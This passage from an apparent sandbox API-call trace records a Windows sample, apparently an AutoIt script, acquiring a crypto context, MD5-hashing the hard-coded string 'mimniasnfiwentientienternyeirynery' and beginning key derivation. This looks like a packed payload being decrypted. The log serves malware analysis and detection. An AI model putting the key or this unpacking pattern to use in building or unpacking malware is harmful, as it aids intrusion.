wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0091.545] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0091.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0091.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0091.546] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.546] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.547] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.547] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0091.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0091.548] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0091.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0091.548] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0091.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0091.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0091.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0091.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0091.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0091.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0091.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0091.551] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0091.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.599] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0091.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0091.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.599] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.599] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0091.600] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.600] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0091.600] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0091.600] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0091.600] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.600] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.601] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0091.601] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.601] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0091.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca7c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0091.601] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0091.601] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.601] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.601] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.601] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0091.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0091.602] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0091.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0091.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0091.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.602] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0091.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0091.602] CryptHashData (hHash=0x41ac440, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0091.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.602] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.603] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0091.603] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0091.603] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0091.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, 